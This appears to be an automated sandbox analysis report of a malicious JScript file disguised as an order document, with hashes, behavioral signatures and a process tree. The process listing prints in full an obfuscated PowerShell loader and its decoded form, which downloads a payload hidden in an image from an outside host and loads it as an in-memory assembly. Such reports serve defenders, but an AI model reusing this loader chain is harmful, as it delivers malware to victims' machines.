Analysis
-
max time kernel
121s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20231130-en -
resource tags
arch:x64arch:x86image:win7-20231130-enlocale:en-usos:windows7-x64system -
submitted
08/12/2023, 04:26
Static task
static1
Behavioral task
behavioral1
Sample
Order NO.Z21239.js
Resource
win7-20231130-en
Behavioral task
behavioral2
Sample
Order NO.Z21239.js
Resource
win10v2004-20231127-en
General
-
Target
Order NO.Z21239.js
-
Size
37KB
-
MD5
9a3023af33fda17f03ff64a98754eaa1
-
SHA1
7af8e08834bdc119be414d94d676ba557d547b55
-
SHA256
4f378640f60e4c8591322a5b9d48223ea8cfc0776ac5f447dcefafba0e3398c6
-
SHA512
dbc5db97af979d70c908d44b81eb62f6fce0f61aa4655eb497e322def951d5c59fdd4a167c8dd4b5b6150d9ea37bd9a366e85f51494b2ce407bc6f9c533ea18a
-
SSDEEP
768:dFWlDgSvfU3vfc5/gTaJgA7jojqjRvMj5vMplDt2olDCgT3lDlg2lDAoH:d8BgRugmJgA9Bt2oBCgrBlg2BAoH
Malware Config
Extracted
https://uploaddeimagens.com.br/images/004/683/196/original/dll_js.jpg?1701821835
https://uploaddeimagens.com.br/images/004/683/196/original/dll_js.jpg?1701821835
Signatures
-
Blocklisted process makes network request 7 IoCs
flow pid Process 3 2940 wscript.exe 5 2940 wscript.exe 7 2940 wscript.exe 10 2940 wscript.exe 12 2712 powershell.exe 14 2712 powershell.exe 15 2712 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 3 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2568 powershell.exe 2712 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2568 powershell.exe Token: SeDebugPrivilege 2712 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2940 wrote to memory of 2568 2940 wscript.exe 28 PID 2940 wrote to memory of 2568 2940 wscript.exe 28 PID 2940 wrote to memory of 2568 2940 wscript.exe 28 PID 2568 wrote to memory of 2712 2568 powershell.exe 30 PID 2568 wrote to memory of 2712 2568 powershell.exe 30 PID 2568 wrote to memory of 2712 2568 powershell.exe 30
Processes
-
C:\Windows\system32\wscript.exewscript.exe "C:\Users\Admin\AppData\Local\Temp\Order NO.Z21239.js"1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:2940 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'J♛♚Bp♛♚G0♛♚YQBn♛♚GU♛♚VQBy♛♚Gw♛♚I♛♚♛♚9♛♚C♛♚♛♚JwBo♛♚HQ♛♚d♛♚Bw♛♚HM♛♚Og♛♚v♛♚C8♛♚dQBw♛♚Gw♛♚bwBh♛♚GQ♛♚Z♛♚Bl♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBu♛♚HM♛♚LgBj♛♚G8♛♚bQ♛♚u♛♚GI♛♚cg♛♚v♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBz♛♚C8♛♚M♛♚♛♚w♛♚DQ♛♚Lw♛♚2♛♚Dg♛♚Mw♛♚v♛♚DE♛♚OQ♛♚2♛♚C8♛♚bwBy♛♚Gk♛♚ZwBp♛♚G4♛♚YQBs♛♚C8♛♚Z♛♚Bs♛♚Gw♛♚XwBq♛♚HM♛♚LgBq♛♚H♛♚♛♚Zw♛♚/♛♚DE♛♚Nw♛♚w♛♚DE♛♚O♛♚♛♚y♛♚DE♛♚O♛♚♛♚z♛♚DU♛♚Jw♛♚7♛♚CQ♛♚dwBl♛♚GI♛♚QwBs♛♚Gk♛♚ZQBu♛♚HQ♛♚I♛♚♛♚9♛♚C♛♚♛♚TgBl♛♚Hc♛♚LQBP♛♚GI♛♚agBl♛♚GM♛♚d♛♚♛♚g♛♚FM♛♚eQBz♛♚HQ♛♚ZQBt♛♚C4♛♚TgBl♛♚HQ♛♚LgBX♛♚GU♛♚YgBD♛♚Gw♛♚aQBl♛♚G4♛♚d♛♚♛♚7♛♚CQ♛♚aQBt♛♚GE♛♚ZwBl♛♚EI♛♚eQB0♛♚GU♛♚cw♛♚g♛♚D0♛♚I♛♚♛♚k♛♚Hc♛♚ZQBi♛♚EM♛♚b♛♚Bp♛♚GU♛♚bgB0♛♚C4♛♚R♛♚Bv♛♚Hc♛♚bgBs♛♚G8♛♚YQBk♛♚EQ♛♚YQB0♛♚GE♛♚K♛♚♛♚k♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBV♛♚HI♛♚b♛♚♛♚p♛♚Ds♛♚J♛♚Bp♛♚G0♛♚YQBn♛♚GU♛♚V♛♚Bl♛♚Hg♛♚d♛♚♛♚g♛♚D0♛♚I♛♚Bb♛♚FM♛♚eQBz♛♚HQ♛♚ZQBt♛♚C4♛♚V♛♚Bl♛♚Hg♛♚d♛♚♛♚u♛♚EU♛♚bgBj♛♚G8♛♚Z♛♚Bp♛♚G4♛♚ZwBd♛♚Do♛♚OgBV♛♚FQ♛♚Rg♛♚4♛♚C4♛♚RwBl♛♚HQ♛♚UwB0♛♚HI♛♚aQBu♛♚Gc♛♚K♛♚♛♚k♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBC♛♚Hk♛♚d♛♚Bl♛♚HM♛♚KQ♛♚7♛♚CQ♛♚cwB0♛♚GE♛♚cgB0♛♚EY♛♚b♛♚Bh♛♚Gc♛♚I♛♚♛♚9♛♚C♛♚♛♚Jw♛♚8♛♚Dw♛♚QgBB♛♚FM♛♚RQ♛♚2♛♚DQ♛♚XwBT♛♚FQ♛♚QQBS♛♚FQ♛♚Pg♛♚+♛♚Cc♛♚Ow♛♚k♛♚GU♛♚bgBk♛♚EY♛♚b♛♚Bh♛♚Gc♛♚I♛♚♛♚9♛♚C♛♚♛♚Jw♛♚8♛♚Dw♛♚QgBB♛♚FM♛♚RQ♛♚2♛♚DQ♛♚XwBF♛♚E4♛♚R♛♚♛♚+♛♚D4♛♚Jw♛♚7♛♚CQ♛♚cwB0♛♚GE♛♚cgB0♛♚Ek♛♚bgBk♛♚GU♛♚e♛♚♛♚g♛♚D0♛♚I♛♚♛♚k♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBU♛♚GU♛♚e♛♚B0♛♚C4♛♚SQBu♛♚GQ♛♚ZQB4♛♚E8♛♚Zg♛♚o♛♚CQ♛♚cwB0♛♚GE♛♚cgB0♛♚EY♛♚b♛♚Bh♛♚Gc♛♚KQ♛♚7♛♚CQ♛♚ZQBu♛♚GQ♛♚SQBu♛♚GQ♛♚ZQB4♛♚C♛♚♛♚PQ♛♚g♛♚CQ♛♚aQBt♛♚GE♛♚ZwBl♛♚FQ♛♚ZQB4♛♚HQ♛♚LgBJ♛♚G4♛♚Z♛♚Bl♛♚Hg♛♚TwBm♛♚Cg♛♚J♛♚Bl♛♚G4♛♚Z♛♚BG♛♚Gw♛♚YQBn♛♚Ck♛♚Ow♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BJ♛♚G4♛♚Z♛♚Bl♛♚Hg♛♚I♛♚♛♚t♛♚Gc♛♚ZQ♛♚g♛♚D♛♚♛♚I♛♚♛♚t♛♚GE♛♚bgBk♛♚C♛♚♛♚J♛♚Bl♛♚G4♛♚Z♛♚BJ♛♚G4♛♚Z♛♚Bl♛♚Hg♛♚I♛♚♛♚t♛♚Gc♛♚d♛♚♛♚g♛♚CQ♛♚cwB0♛♚GE♛♚cgB0♛♚Ek♛♚bgBk♛♚GU♛♚e♛♚♛♚7♛♚CQ♛♚cwB0♛♚GE♛♚cgB0♛♚Ek♛♚bgBk♛♚GU♛♚e♛♚♛♚g♛♚Cs♛♚PQ♛♚g♛♚CQ♛♚cwB0♛♚GE♛♚cgB0♛♚EY♛♚b♛♚Bh♛♚Gc♛♚LgBM♛♚GU♛♚bgBn♛♚HQ♛♚a♛♚♛♚7♛♚CQ♛♚YgBh♛♚HM♛♚ZQ♛♚2♛♚DQ♛♚T♛♚Bl♛♚G4♛♚ZwB0♛♚Gg♛♚I♛♚♛♚9♛♚C♛♚♛♚J♛♚Bl♛♚G4♛♚Z♛♚BJ♛♚G4♛♚Z♛♚Bl♛♚Hg♛♚I♛♚♛♚t♛♚C♛♚♛♚J♛♚Bz♛♚HQ♛♚YQBy♛♚HQ♛♚SQBu♛♚GQ♛♚ZQB4♛♚Ds♛♚J♛♚Bi♛♚GE♛♚cwBl♛♚DY♛♚N♛♚BD♛♚G8♛♚bQBt♛♚GE♛♚bgBk♛♚C♛♚♛♚PQ♛♚g♛♚CQ♛♚aQBt♛♚GE♛♚ZwBl♛♚FQ♛♚ZQB4♛♚HQ♛♚LgBT♛♚HU♛♚YgBz♛♚HQ♛♚cgBp♛♚G4♛♚Zw♛♚o♛♚CQ♛♚cwB0♛♚GE♛♚cgB0♛♚Ek♛♚bgBk♛♚GU♛♚e♛♚♛♚s♛♚C♛♚♛♚J♛♚Bi♛♚GE♛♚cwBl♛♚DY♛♚N♛♚BM♛♚GU♛♚bgBn♛♚HQ♛♚a♛♚♛♚p♛♚Ds♛♚J♛♚Bj♛♚G8♛♚bQBt♛♚GE♛♚bgBk♛♚EI♛♚eQB0♛♚GU♛♚cw♛♚g♛♚D0♛♚I♛♚Bb♛♚FM♛♚eQBz♛♚HQ♛♚ZQBt♛♚C4♛♚QwBv♛♚G4♛♚dgBl♛♚HI♛♚d♛♚Bd♛♚Do♛♚OgBG♛♚HI♛♚bwBt♛♚EI♛♚YQBz♛♚GU♛♚Ng♛♚0♛♚FM♛♚d♛♚By♛♚Gk♛♚bgBn♛♚Cg♛♚J♛♚Bi♛♚GE♛♚cwBl♛♚DY♛♚N♛♚BD♛♚G8♛♚bQBt♛♚GE♛♚bgBk♛♚Ck♛♚Ow♛♚k♛♚Gw♛♚bwBh♛♚GQ♛♚ZQBk♛♚EE♛♚cwBz♛♚GU♛♚bQBi♛♚Gw♛♚eQ♛♚g♛♚D0♛♚I♛♚Bb♛♚FM♛♚eQBz♛♚HQ♛♚ZQBt♛♚C4♛♚UgBl♛♚GY♛♚b♛♚Bl♛♚GM♛♚d♛♚Bp♛♚G8♛♚bg♛♚u♛♚EE♛♚cwBz♛♚GU♛♚bQBi♛♚Gw♛♚eQBd♛♚Do♛♚OgBM♛♚G8♛♚YQBk♛♚Cg♛♚J♛♚Bj♛♚G8♛♚bQBt♛♚GE♛♚bgBk♛♚EI♛♚eQB0♛♚GU♛♚cw♛♚p♛♚Ds♛♚J♛♚B0♛♚Hk♛♚c♛♚Bl♛♚C♛♚♛♚PQ♛♚g♛♚CQ♛♚b♛♚Bv♛♚GE♛♚Z♛♚Bl♛♚GQ♛♚QQBz♛♚HM♛♚ZQBt♛♚GI♛♚b♛♚B5♛♚C4♛♚RwBl♛♚HQ♛♚V♛♚B5♛♚H♛♚♛♚ZQ♛♚o♛♚Cc♛♚QwBs♛♚GE♛♚cwBz♛♚Ew♛♚aQBi♛♚HI♛♚YQBy♛♚Hk♛♚Mw♛♚u♛♚EM♛♚b♛♚Bh♛♚HM♛♚cw♛♚x♛♚Cc♛♚KQ♛♚7♛♚CQ♛♚bQBl♛♚HQ♛♚a♛♚Bv♛♚GQ♛♚I♛♚♛♚9♛♚C♛♚♛♚J♛♚B0♛♚Hk♛♚c♛♚Bl♛♚C4♛♚RwBl♛♚HQ♛♚TQBl♛♚HQ♛♚a♛♚Bv♛♚GQ♛♚K♛♚♛♚n♛♚FI♛♚dQBu♛♚Cc♛♚KQ♛♚u♛♚Ek♛♚bgB2♛♚G8♛♚awBl♛♚Cg♛♚J♛♚Bu♛♚HU♛♚b♛♚Bs♛♚Cw♛♚I♛♚Bb♛♚G8♛♚YgBq♛♚GU♛♚YwB0♛♚Fs♛♚XQBd♛♚C♛♚♛♚K♛♚♛♚n♛♚GQ♛♚S♛♚Bo♛♚D♛♚♛♚T♛♚Br♛♚E4♛♚TgBV♛♚Gk♛♚OQBu♛♚GM♛♚bgBj♛♚HY♛♚TwBD♛♚DQ♛♚egBO♛♚EM♛♚N♛♚♛♚0♛♚E0♛♚agBJ♛♚HU♛♚TgBq♛♚Fk♛♚dgBM♛♚Ho♛♚c♛♚B3♛♚GQ♛♚S♛♚BS♛♚G8♛♚Jw♛♚g♛♚Cw♛♚I♛♚♛♚n♛♚GQ♛♚ZgBk♛♚GY♛♚Z♛♚♛♚n♛♚C♛♚♛♚L♛♚♛♚g♛♚Cc♛♚Z♛♚Bm♛♚GQ♛♚Zg♛♚n♛♚C♛♚♛♚L♛♚♛♚g♛♚Cc♛♚Z♛♚Bm♛♚GQ♛♚Zg♛♚n♛♚C♛♚♛♚L♛♚♛♚g♛♚Cc♛♚Z♛♚Bh♛♚GQ♛♚cwBh♛♚Cc♛♚I♛♚♛♚s♛♚C♛♚♛♚JwBk♛♚GU♛♚Jw♛♚g♛♚Cw♛♚I♛♚♛♚n♛♚GM♛♚dQ♛♚n♛♚Ck♛♚KQ♛♚=';$OWjuxd = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($codigo.replace('♛♚','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxd"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2568 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/683/196/original/dll_js.jpg?1701821835';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('ClassLibrary3.Class1');$method = $type.GetMethod('Run').Invoke($null, [object[]] ('dHh0LkNNUi9ncncvOC4zNC44MjIuNjYvLzpwdHRo' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2712
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
65KB
MD5ac05d27423a85adc1622c714f2cb6184
SHA1b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA5126d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d
-
Filesize
1KB
MD5a266bb7dcc38a562631361bbf61dd11b
SHA13b1efd3a66ea28b16697394703a72ca340a05bd5
SHA256df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e
SHA5120da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5b1529796de9598023510a36334ef1147
SHA17de26a18848dd6cd4d3a5e8bc3672a1375b0c9e5
SHA2568e22c9d226a3b50a668e73f906e5477dc3f8b35e7683997b3143d4d5d17b35c0
SHA5122f28969f68ac5623d4becf5c81e53f385266df25d0a5b1f4a548631e37b2786b2edcb96f607a9d931ab3cd0dfd7745e7783430a27348809f79b58c145f241868
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD50eca7d4a6954c268072754da3b19b4d8
SHA1290f048633eee6f1d304e8a75013ab58b0d0ffd8
SHA256b3436bd9676f0cb52fb3aae5365b06830a8a254c1f3979415863f5b70ac5e71c
SHA5123c7736dda0f7ccef7769af310e4f993ddb1d81b7356ecfe7f88ed1801621501f1c41484287100894aefa7259df9553003fd4a8178162a3f6daf9718865ac06ee
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
Filesize242B
MD5cca981a13aca69f997066820eeca8ea9
SHA14321c495e20ddce52a1025f0a063d73e9d76eba4
SHA2567f93db5251ea461433650d3baf1068b4b18946f1086621b06f62b4287a982779
SHA512968df4b4c6ef6da04afb65d20045d8a3a2b001fbef7df33601b312421030771cd628ce6cc287cbc5cb4cee426c196f934927dd8a78fe3ecd792a11f5c5b48280
-
Filesize
65KB
MD5ac05d27423a85adc1622c714f2cb6184
SHA1b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA5126d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d
-
Filesize
171KB
MD59c0c641c06238516f27941aa1166d427
SHA164cd549fb8cf014fcd9312aa7a5b023847b6c977
SHA2564276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f
SHA512936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5aba4eb063a707d691f8c75c62243e615
SHA16731d5a587b9d5ff7de2a1b168be27da7a21348d
SHA256dc366bdef846b1240efa211b036acc8b96c9df2b69596fb8d6ab5e8432008c1a
SHA51270b16dd91322cd742fa8dcd543d3582c83ff71dbf5b3243b069d8f0f0ec59cef26f3e67209d6e36f260479ff7ad24ac9a522a1bbb41f72e79b80cc44aed302fc
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\CYBBDJZ73VHGL3XUCA4E.temp
Filesize7KB
MD5aba4eb063a707d691f8c75c62243e615
SHA16731d5a587b9d5ff7de2a1b168be27da7a21348d
SHA256dc366bdef846b1240efa211b036acc8b96c9df2b69596fb8d6ab5e8432008c1a
SHA51270b16dd91322cd742fa8dcd543d3582c83ff71dbf5b3243b069d8f0f0ec59cef26f3e67209d6e36f260479ff7ad24ac9a522a1bbb41f72e79b80cc44aed302fc